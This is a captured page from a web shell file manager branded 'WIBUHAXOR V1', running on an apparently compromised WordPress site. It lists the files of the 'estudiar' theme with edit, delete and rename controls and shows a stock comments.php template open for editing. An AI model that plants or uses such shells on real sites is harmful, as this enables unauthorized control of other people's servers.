-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
themes
/
estudiar
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
languages
--
NONE
samples
--
NONE
templates
--
NONE
tribe-events
--
NONE
utils
--
NONE
vamtam
--
NONE
vendor
--
NONE
woocommerce
--
NONE
Gruntfile.js
1.756KB
Edit File
Delete File
Rename
archive.php
0.781KB
Edit File
Delete File
Rename
attachment.php
3.172KB
Edit File
Delete File
Rename
author.php
1.387KB
Edit File
Delete File
Rename
comments.php
2.953KB
Edit File
Delete File
Rename
composer.lock
0.558KB
Edit File
Delete File
Rename
footer.php
0.84KB
Edit File
Delete File
Rename
functions.php
1.964KB
Edit File
Delete File
Rename
header.php
1.303KB
Edit File
Delete File
Rename
index.php
0.423KB
Edit File
Delete File
Rename
loop.php
1.205KB
Edit File
Delete File
Rename
package-lock.json
339.015KB
Edit File
Delete File
Rename
phpcs.xml
0.608KB
Edit File
Delete File
Rename
screenshot.jpg
24.494KB
Edit File
Delete File
Rename
search.php
1.066KB
Edit File
Delete File
Rename
searchform.php
0.709KB
Edit File
Delete File
Rename
sidebar.php
0.35KB
Edit File
Delete File
Rename
single.php
1.012KB
Edit File
Delete File
Rename
wpml-config.xml
0.297KB
Edit File
Delete File
Rename
<?php /** * Comments template * * @package vamtam/caridad */ wp_reset_postdata(); if ( ! defined( 'ABSPATH' ) ) { die( 'Please do not load this page directly. Thanks!' ); } $req = get_option( 'require_name_email' ); // Checks if fields are required. // cookies consent $commenter = wp_get_current_commenter(); $consent = empty( $commenter['comment_author_email'] ) ? '' : ' checked="checked"'; // do not display anything if the post is protected or the comments are closed and there is no comment history if ( ( ! empty( $post->post_password ) && post_password_required() ) || ( ! comments_open() && ! have_comments() ) || ! post_type_supports( get_post_type(), 'comments' ) ) { return; } $classes = 'clearboth'; if ( ! VamtamElementorBridge::is_elementor_active() ) { $classes .= ' limit-wrapper'; } ?> <div class="<?php echo esc_attr( $classes ); ?>"> <div id="comments" class="comments-wrapper"> <?php if ( have_comments() ) : ?> <?php // numbers of pings and comments $ping_count = $comment_count = 0; foreach ( $comments as $comment ) { get_comment_type() == 'comment' ? ++$comment_count : ++$ping_count; } ?> <div class="sep-text centered keep-always"> <div class="content"> <?php comments_number( esc_html__( '0 Comments:', 'estudiar' ), esc_html__( '1 Comment', 'estudiar' ), esc_html__( '% Comments:', 'estudiar' ) ); ?> </div> </div> <?php if ( $comment_count ) : ?> <div id="comments-list" class="comments"> <?php wp_list_comments( array( 'type' => 'comment', 'callback' => array( 'VamtamTemplates', 'comments' ), 'style' => 'div', ) ); ?> </div> <?php endif; ?> <?php if ( $ping_count ) : ?> <div class="sep-text centered keep-always"> <div class="content"> <?php echo sprintf( $ping_count > 1 ? esc_html__( '%d Trackbacks:', 'estudiar' ) : esc_html__( 'One Trackback:', 'estudiar' ), (int) (int) $ping_count ); // xss ok ?> </div> </div> <div id="trackbacks-list" class="comments"> <?php wp_list_comments( array( 'type' => 'pings', 'callback' => array( 'VamtamTemplates', 'comments' ), 'style' => 'div', 'short_ping' => true, ) ); ?> </div> <?php endif ?> <?php endif ?> <?php the_comments_pagination( array( 'prev_text' => '<span class="screen-reader-text">' . esc_html__( 'Previous', 'estudiar' ) . '</span>', 'next_text' => '<span class="screen-reader-text">' . esc_html__( 'Next', 'estudiar' ) . '</span>', ) ); ?> <div class="respond-box"> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'estudiar' ); ?></p> <?php endif; ?> <?php comment_form( [ 'title_reply_before' => '<h5 id="reply-title" class="comment-reply-title">', 'title_reply_after' => '</h5>', ] ); ?> </div><!-- .respond-box --> </div><!-- #comments --> </div>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat